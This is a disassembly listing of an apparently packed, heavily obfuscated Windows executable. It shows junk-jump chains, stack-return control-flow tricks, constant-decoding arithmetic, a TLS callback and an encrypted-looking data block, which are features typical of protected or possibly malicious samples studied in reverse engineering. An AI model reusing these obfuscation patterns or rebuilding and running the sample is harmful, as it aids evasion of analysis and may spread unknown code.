; ---------------------------------------------------------------------------
loc_42EAEA: ; CODE XREF: _0182ofla:0042E678�j
jg loc_42E3A4
; =============== S U B R O U T I N E =======================================
sub_42EAF0 proc near ; CODE XREF: sub_42D1C4+12�p
mov [esp+0], ebx
pop ebx
push 0B9860994h
jmp loc_427A18
sub_42EAF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EAFE proc near ; DATA XREF: sub_4288BB+1�o
var_1 = byte ptr -1
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042ADFF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C6D6 SIZE 00000005 BYTES
mov ebp, esp
push ecx
mov [ebp+var_1], 0
mov eax, cs
xor al, al
call sub_42AB9B
loc_42EB0E: ; CODE XREF: sub_42E841+7�j
jmp loc_42ADFF
sub_42EAFE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_42EB13: ; CODE XREF: sub_428F46-34EF�j
jmp loc_428CB8
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB7
loc_42EB18: ; CODE XREF: sub_42ABB7+2499�j
jz loc_42462B
jmp loc_42B39E
; END OF FUNCTION CHUNK FOR sub_42ABB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42EB23: ; CODE XREF: sub_428AC9+1237�j
jnz loc_42E153
jmp loc_42CF1F
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
loc_42EB2E: ; DATA XREF: sub_428729-69C�o
call sub_42D888
mov eax, [ebp-30h]
push edx
push 0B9A4BB15h
jmp loc_42D0A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9A5
loc_42EB41: ; CODE XREF: sub_42E9A5+13�j
jz loc_427FE3
mov ecx, ebp
jmp loc_4276F2
; END OF FUNCTION CHUNK FOR sub_42E9A5
; =============== S U B R O U T I N E =======================================
sub_42EB4E proc near ; CODE XREF: sub_42C8C0:loc_42D295�p
; _0182ofla:0042D9DB�j
; FUNCTION CHUNK AT 0042633D SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-8]
pop ecx
push offset sub_42A01E
jmp loc_42633D
sub_42EB4E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BB9
loc_42EB60: ; CODE XREF: sub_429BB9+B�j
not eax
mov [edx], esi
jmp loc_4230A0
; END OF FUNCTION CHUNK FOR sub_429BB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42EB69: ; CODE XREF: sub_4253F4+30C3�j
cpuid
and eax, 2FFFh
add [esi], eax
push edi
push 0EAB130A3h
jmp loc_42AC44
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
sub_42EB7D proc near ; CODE XREF: _0182ofla:00423E97�j
; sub_4249DB+A�p
mov [esp+0], ebx
pop ebx
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
jmp loc_429DE8
sub_42EB7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB00
loc_42EB91: ; CODE XREF: sub_42CB00:loc_42AB64�j
; sub_42CB00+18C6�j
push eax
push 226E4643h
pop eax
add eax, 0D9A9C221h
rol eax, 0Fh
push offset loc_427178
jmp loc_42D3BF
; END OF FUNCTION CHUNK FOR sub_42CB00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C998
loc_42EBAB: ; CODE XREF: sub_42C998+16�j
pop eax
pop ecx
pop ebx
mov edx, offset loc_42EBBC
xchg edx, [esp-10h+arg_C]
retn
; END OF FUNCTION CHUNK FOR sub_42C998
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_42EBB7: ; CODE XREF: sub_42E689-4635�j
jmp loc_429625
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_42EBBC: ; CODE XREF: sub_426319-2CA6�j
; DATA XREF: sub_42C998+2216�o
xchg ebx, [esp-10h+arg_C]
jmp loc_42759E
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
loc_42EBC4: ; CODE XREF: _0182ofla:004253C2�j
jg loc_42797C
cdq
jmp sub_42CE86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42EBD0: ; CODE XREF: sub_42E585:loc_427EAA�j
; sub_42798F:loc_42D6EC�j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 47424454h
jnz loc_4236F0
jmp loc_42595F
; ---------------------------------------------------------------------------
loc_42EBE7: ; CODE XREF: sub_42798F:loc_42564E�j
cmp dword ptr [ebp-4], 7
jmp loc_42AEED
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42EBF0: ; CODE XREF: sub_427239+39F4�j
add ecx, 5AB75EE3h
xchg ecx, [esp+0]
jmp sub_4278DB
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
loc_42EBFE: ; DATA XREF: sub_426455:loc_427491�o
add eax, 0C9C49382h
xchg eax, [esp]
push 20BBCAECh
mov eax, offset sub_42EC1A
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423249
loc_42EC15: ; CODE XREF: sub_423249+9�j
jmp loc_42C4DD
; END OF FUNCTION CHUNK FOR sub_423249
; =============== S U B R O U T I N E =======================================
sub_42EC1A proc near ; DATA XREF: _0182ofla:0042EC0C�o
; FUNCTION CHUNK AT 004297D9 SIZE 00000002 BYTES
sub eax, 6DBC2AAAh
xor eax, 3968FB62h
jmp loc_4297D9
sub_42EC1A endp
; ---------------------------------------------------------------------------
locret_42EC2B: ; CODE XREF: _0182ofla:004294DA�j
retn
; ---------------------------------------------------------------------------
loc_42EC2C: ; CODE XREF: _0182ofla:0042D9E3�j
jmp loc_428363
; ---------------------------------------------------------------------------
push 2E8F8FCAh
pop edx
or edx, 0B6A7E731h
add edx, 38DDADC2h
jmp loc_42CC9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42EC48: ; CODE XREF: sub_42537E+1F4E�j
jnp loc_4249AD
loc_42EC4E: ; CODE XREF: sub_42537E:loc_42D6F7�j
call sub_428CE6
; END OF FUNCTION CHUNK FOR sub_42537E
; START OF FUNCTION CHUNK FOR sub_423127
loc_42EC53: ; CODE XREF: sub_423127:loc_4278C7�j
xchg edi, [esp+0]
call sub_42B5CC
; END OF FUNCTION CHUNK FOR sub_423127
; START OF FUNCTION CHUNK FOR sub_425E13
loc_42EC5B: ; CODE XREF: sub_425E13+5�j
jmp loc_42C386
; END OF FUNCTION CHUNK FOR sub_425E13
; =============== S U B R O U T I N E =======================================
sub_42EC60 proc near ; DATA XREF: sub_42A01E+1�o
pop ebp
retn
sub_42EC60 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42EC62: ; CODE XREF: sub_42798F+4C3C�j
jmp loc_42B264
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4292E1
loc_42EC67: ; CODE XREF: sub_4292E1-47FD�j
jmp nullsub_235
; END OF FUNCTION CHUNK FOR sub_4292E1
; ---------------------------------------------------------------------------
loc_42EC6C: ; CODE XREF: _0182ofla:0042598A�j
push offset loc_42D464
jmp locret_4278EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CDE
loc_42EC76: ; CODE XREF: sub_427CDE:loc_4272A6�j
jz loc_42D17A
jmp loc_4237CC
; END OF FUNCTION CHUNK FOR sub_427CDE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42EC82: ; CODE XREF: _0182ofla:00429BD4�j
jmp loc_4283D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42EC88: ; CODE XREF: sub_42D056-288B�j
jmp loc_42A574
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42EC8D: ; CODE XREF: sub_42798F-2E24�j
jmp loc_429ABB
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42EC92: ; CODE XREF: _0182ofla:0042922F�j
push eax
push 63FE0A09h
pop eax
and eax, 0BC853675h
jmp loc_42D0BD
; ---------------------------------------------------------------------------
loc_42ECA4: ; DATA XREF: sub_42945B-2D94�o
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240FC
loc_42ECA8: ; CODE XREF: sub_4240FC+8�j
jmp loc_423A30
; END OF FUNCTION CHUNK FOR sub_4240FC
; =============== S U B R O U T I N E =======================================
sub_42ECAD proc near ; CODE XREF: sub_428EB9-4DDB�p
; sub_42912B+7�p ...
; FUNCTION CHUNK AT 00427B95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042991C SIZE 0000000A BYTES
jz sub_4258F5
push ebp
mov ebp, esp
call sub_429A64
loc_42ECBB: ; CODE XREF: sub_42CA48+F�j
jmp loc_42991C
sub_42ECAD endp
; ---------------------------------------------------------------------------
loc_42ECC0: ; CODE XREF: _0182ofla:0042AFFA�j
jmp loc_428DB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42ECC5: ; CODE XREF: sub_42D056-33FE�j
jz loc_42A7AE
jmp loc_4236BB
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B860
loc_42ECD0: ; CODE XREF: sub_42B860+10�j
pushf
; END OF FUNCTION CHUNK FOR sub_42B860
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42ECD1: ; CODE XREF: sub_428A39-CDF�j
mov [esp+0], eax
call dword ptr [ebp-4]
push offset sub_428265
jmp loc_426A8D
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42ECE1: ; CODE XREF: sub_427259:loc_42C6A0�j
xchg eax, [esp+0]
jmp loc_42350B
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_42ECE9: ; CODE XREF: TlsCallback_0:loc_42B3D2�j
test esi, eax
jmp loc_424AF8
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
loc_42ECF0: ; CODE XREF: _0182ofla:0042E820�j
mov [edx], eax
; =============== S U B R O U T I N E =======================================
sub_42ECF2 proc near ; CODE XREF: sub_42D056:loc_424F2A�p
arg_0 = dword ptr 4
xchg ebx, [esp+0]
pop ebx
mov [esp-4+arg_0], eax
retn
sub_42ECF2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42ECFA proc near ; CODE XREF: sub_42628D+3�j
; sub_42D056:loc_42DE1D�p
; FUNCTION CHUNK AT 0042E2FF SIZE 00000005 BYTES
call sub_424533
loc_42ECFF: ; CODE XREF: sub_423A2A+357A�j
jmp loc_42E2FF
sub_42ECFA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C906
loc_42ED04: ; CODE XREF: sub_42C906:loc_42B3A3�j
xchg ebp, [ebx]
jmp loc_427E6A
; END OF FUNCTION CHUNK FOR sub_42C906
; ---------------------------------------------------------------------------
mov edx, 63180CAFh
call sub_42A041
loc_42ED15: ; CODE XREF: _0182ofla:0042C505�j
jmp sub_42D71D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_42ED1A: ; CODE XREF: sub_42461C+5C9�j
pop esi
mov eax, ds:dword_42D210
or eax, eax
jnz loc_426D53
jmp loc_42B4F4
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42ED2E: ; CODE XREF: sub_42D833-64F5�j
jz loc_42D8D0
jmp loc_428355
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42ED39: ; CODE XREF: sub_428AC9:loc_42E563�j
add ebx, ebp
add ebx, 0EC8D8B8Dh
mov [ebx], eax
pop ebx
jmp loc_42A45B
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_42ED49: ; CODE XREF: sub_425629+6F81�j
test eax, 9D820CC3h
jmp loc_42351A
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42ED54: ; CODE XREF: sub_427445:loc_427536�j
add eax, 226281D3h
loc_42ED5A: ; CODE XREF: sub_42798F:loc_424A02�j
mov eax, [eax]
or eax, eax
jnz loc_42C131
call sub_428D17
mov edx, 0DD5E106Fh
jmp loc_425569
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42ED73: ; CODE XREF: sub_425BF8:loc_42AE31�j
or eax, eax
jz loc_42D4BE
call sub_42E6FD
loc_42ED80: ; CODE XREF: _0182ofla:loc_423549�j
; _0182ofla:004247C1�j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_42564E
; ---------------------------------------------------------------------------
loc_42ED97: ; CODE XREF: sub_425BF8:loc_42481C�j
cmp dword ptr [ebp-4], 6
jnz loc_42564E
jmp loc_429313
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42EDA6: ; CODE XREF: sub_428EB9+4A77�j
mov edx, [ebp+8]
mov [edx-18h], eax
inc dword ptr [ebp-4]
; END OF FUNCTION CHUNK FOR sub_428EB9
; START OF FUNCTION CHUNK FOR sub_423704
loc_42EDAF: ; CODE XREF: sub_423704:loc_427F2D�j
mov eax, [ebp+8]
mov eax, [eax-18h]
and eax, 7
mov [ebp-0Ch], eax
cmp dword ptr [ebp-10h], 0
jmp loc_425A18
; END OF FUNCTION CHUNK FOR sub_423704
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42EDC4: ; CODE XREF: sub_42AAF8:loc_425F72�j
; sub_429C68+4801�j
adc esi, 0E81E38CDh
jmp loc_42B7CB
; END OF FUNCTION CHUNK FOR sub_42AAF8
; =============== S U B R O U T I N E =======================================
sub_42EDCF proc near ; CODE XREF: _0182ofla:00423E0B�p
; _0182ofla:00428168�j
mov [esp+0], edi
pop edi
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_426551
lea eax, [ebp-125h]
push eax
call sub_426561
jmp loc_428423
sub_42EDCF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add ebx, 0E3FBFF15h
jmp loc_42C377
; ---------------------------------------------------------------------------
TlsDirectory dd 0
TlsEnd_ptr dd 0
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex dd 0 ; DATA XREF: _0182ofla:TlsIndex_ptr�o
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: _0182ofla:TlsCallbacks_ptr�o
dd 0
dd 1F294A43h, 2A5EB3B7h, 55B52374h, 0D58AACA3h, 0B16E31D9h
dd 0F5F684D2h, 892F746Ch, 8CCEAC23h, 0DFC21AEh, 1799C0FDh
dd 82AF5362h, 215F0F31h, 0D3D3757Ah, 5698CF41h, 660E1B24h
dd 86C71279h, 0E09B0570h, 4AE4BA45h, 0BA73C5F4h, 0E2515F8Fh
dd 50DB9B65h, 0C59BDE9Ch, 26191730h, 21940EC3h, 829DF271h
dd 127C3EEh, 0F87242EFh, 0CE214730h, 69B9DD84h, 56CE9F11h
dd 8F96C674h, 0A0246593h, 712E94h, 64FF890Fh, 561129EFh
dd 46DDB44Bh, 8DE9CE86h, 9E3C3B57h, 7769FD5h, 2AE4D4D6h
dd 7FD68FEEh, 0A606CB06h, 0E84CE699h, 73814F57h, 169D5695h
dd 5169FF6Fh, 0D9996174h, 91FA6AACh, 0F4EC508Ah, 0D70A48C9h
dd 35392120h, 0A1D15A7Ch, 0D8347AF5h, 0F3748742h, 6A68D3BFh
dd 0F4047402h, 0D3BF69Fh, 200BC9D8h, 4C8E8521h, 3CE9FA92h
dd 6085F761h, 9DE5DD5Eh, 28671F67h, 0A032485Ah, 28581DA6h
dd 0CF47E5D4h, 5996D9AAh, 0C485C090h, 0B2CEEC72h, 0DB375CBAh
dd 0E872DBC7h, 0EA895C33h, 0B61DBB76h, 0C52B38F0h, 4A7663B7h
dd 402BF385h, 0AC7513DEh, 0DECF24C5h, 0B23EC20Bh, 0F07718CCh
dd 6F681999h, 0C0F439ABh, 0AF82A043h, 3C03F459h, 0E310339Dh
dd 2E7F45E9h, 0D08BED0Fh, 0E7005DCh, 41FC725Fh, 0F3008083h
dd 4AF03487h, 0B013EBE6h, 2EE91F77h, 4369FFDBh, 9F8FEE57h
dd 0B7BC0905h, 81BC3845h, 0BDEE58E6h, 0BBF78E87h, 0D37BE838h
dd 5CDC4A29h, 0E2310B94h, 0D7EBAF45h, 2B3244A7h, 478E9B2Ch
dd 0CA5DF809h, 37171969h, 346F5BEAh, 635370F0h, 0C9CD9FF5h
dd 65C77EA6h, 539170C7h, 0DC26D3Dh, 777FFD6Ah, 9C5EBA91h
dd 0EC966643h, 0BA75C349h, 0E48FACE5h, 90192D5Eh, 0CF57D3A0h
_0182ofla ends
; Section 6. (virtual address 0002F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0002F000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
s7b_1gp8 segment para public 'DATA' use32
assume cs:s7b_1gp8
;org 42F000h
dd 23000h, 60h, 30B93058h, 31CB3102h, 32D532B1h, 32FE32E7h
dd 3401330Ch, 34583438h, 34FD34E1h, 35A1356Ah, 35F835BEh
dd 3667362Eh, 372C371Dh, 38AD37C3h, 39473904h, 396D3956h
dd 39A9398Eh, 3A1439D1h, 3BED3A22h, 3CD03CA1h, 3E383D89h
dd 3E8A3E41h, 3F243EE0h, 3F9C3F7Ah, 24000h, 80h, 3038300Ah
dd 30C2309Eh, 317B30F0h, 31E831B4h, 3269322Ah, 335032BBh
dd 33F83365h, 3431340Dh, 34833474h, 354D34CEh, 359F3572h
dd 35C135A9h, 365135F0h, 37A9365Eh, 380C37CEh, 385F3823h
dd 38FA38E5h, 39C53997h, 3A4539F5h, 3AE03ACAh, 3B063AEFh
dd 3B5F3B1Ch, 3BC33BABh, 3CEE3CDAh, 3D813D1Dh, 3DE63DA4h
dd 3E9F3E84h, 3F1C3EA9h, 3F943F80h, 3FE73FCCh, 25000h
dd 6Ch, 303F3035h, 30DB30A5h, 313F312Dh, 31B13183h, 31E631CFh
dd 32303206h, 3244323Eh, 32CB32B5h, 336D330Ch, 3472342Bh
dd 3490347Ch, 350834B9h, 35C53591h, 360135E1h, 3645360Eh
dd 3893375Fh, 38C1389Dh, 3AD93A9Bh, 3B4F3AF7h, 3B9E3B76h
dd 3BCA3BC5h, 3C5E3C28h, 3E013D9Ch, 3F1F3E3Bh, 3FBD3F42h
dd 26000h, 78h, 304F3039h, 30AB3089h, 321D31A7h, 32AC329Bh
dd 32EB32D4h, 33083303h, 33663338h, 33FA33E7h, 34BA3439h
dd 350534D4h, 35453540h, 35AD3568h, 361135CEh, 370436C8h
dd 38433803h, 38A13848h, 39873958h, 39B3399Bh, 39D039C2h
dd 3AB43A34h, 3C1D3BD1h, 3D033C71h, 3D793D2Bh, 3DFB3DC7h
dd 3EF93EDDh, 3F593F3Bh, 3F993F8Dh, 3FE7h, 27000h, 7Ch
dd 30B83024h, 317A3113h, 322731B3h, 32923282h, 33323323h
dd 3401337Fh, 34603406h, 34923470h, 34FA34B7h, 3594351Fh
dd 36743648h, 370B36C1h, 37593727h, 378E3772h, 380437A4h
dd 389F3844h, 38CD38B5h, 39C839A1h, 3C5C3ADCh, 3CB93C89h
dd 3CE93CC3h, 3D333D1Ch, 3D9B3D6Eh, 3E273DA0h, 3E783E39h
dd 3EBF3E87h, 3F253EC6h, 3FA13F8Fh, 3FF83FE8h, 28000h
dd 70h, 30303002h, 307B3070h, 30BC308Eh, 30F630C1h, 319F3123h
dd 332432EEh, 33493337h, 33723364h, 344E33FAh, 355F3502h
dd 36153584h, 38BD38A0h, 391938CEh, 3A273A0Eh, 3A783A66h
dd 3AE73AACh, 3B353B1Ah, 3C0F3B9Ah, 3D043CF6h, 3D2F3D24h
dd 3DE03D4Ch, 3E4D3E0Ah, 3E583E53h, 3F163EB0h, 3F7F3F73h
dd 3FC2h, 29000h, 6Ch, 30F430B6h, 31F731E5h, 32633215h
dd 32803271h, 3299328Ah, 32C532A7h, 335D32FFh, 341733D4h
dd 34C1349Bh, 352A34D6h, 35593542h, 35F3355Fh, 369D3611h
dd 373636B1h, 37553745h, 383F3764h, 388E3871h, 391D389Eh
dd 3B343931h, 3B843B6Bh, 3C033BAAh, 3C8A3C4Ch, 3E1E3D8Fh
dd 3F913EB0h, 3FF1h, 2A000h, 80h, 30203013h, 30663061h
dd 30EC3094h, 315630FBh, 3247321Bh, 3313329Ch, 3339331Dh
dd 340033F3h, 3523342Ah, 356B3557h, 360735A5h, 36F5369Ah
dd 374B3745h, 37A0378Fh, 37D137BBh, 380F37E2h, 3853382Fh
dd 38AF388Eh, 3A593A0Eh, 3AD73A71h, 3B033AE6h, 3C703C10h
dd 3CBF3CB1h, 3CEE3CD9h, 3D293D16h, 3E073D65h, 3E9F3E1Eh
dd 3EB33EA5h, 3F7A3EE3h, 3FE93FC3h, 2B000h, 54h, 304F304Ah
dd 3092307Eh, 314F310Ch, 31723164h, 3247322Fh, 32843254h
dd 330D32D0h, 33423326h, 3393337Ch, 340F33B0h, 34A1344Bh
dd 34C034B6h, 353534CCh, 36293612h, 365B3642h, 372F3710h
dd 37713757h, 37EB37D9h, 389A37F0h, 2C000h, 68h, 317D3178h
dd 3236321Bh, 326F3251h, 32A53290h, 32B632B0h, 333232DDh
dd 34BA335Fh, 34FE34C6h, 36D1364Dh, 3875377Dh, 396E38B7h
dd 3A6C3A5Dh, 3AC03AA6h, 3AF73AD3h, 3B0E3B08h, 3BA13B9Ch
dd 3BCC3BB2h, 3CB43C90h, 3CD63CC3h, 3CFB3CE2h, 3DD43D59h
dd 3E213E06h, 3EBC3E8Ch, 3FC9h, 2D000h, 78h, 30943083h
dd 30EC30DCh, 31B330F9h, 33983349h, 34C33400h, 353F34F9h
dd 35883578h, 360E3595h, 3771362Ah, 37E4377Ch, 389937F9h
dd 395638E5h, 3A2139BFh, 3AFA3A58h, 3BC43BBFh, 3BFC3BE0h
dd 3C353C2Eh, 3C683C50h, 3CB33C87h, 3D1D3CE6h, 3DC63D90h
dd 3E243DF5h, 3E4D3E31h, 3F343EDBh, 3F583F43h, 3FA33F93h
dd 3FEF3FD7h, 3FFCh, 2E000h, 6Ch, 30F93006h, 314A3140h
dd 320131B1h, 323F3206h, 32AA3289h, 330F32B9h, 33533342h
dd 338C3387h, 3481346Fh, 34E334B0h, 35BD34EBh, 370535DFh
dd 37423710h, 37CC3793h, 380E37F1h, 38953876h, 395038B4h
dd 3A313A02h, 3BA23B57h, 3BF23BAFh, 3C6D3C0Dh, 3D1D3CD8h
dd 3E043D56h, 3E183E08h, 2B2h dup(0)
s7b_1gp8 ends
; Section 7. (virtual address 00030000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00030000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 430000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start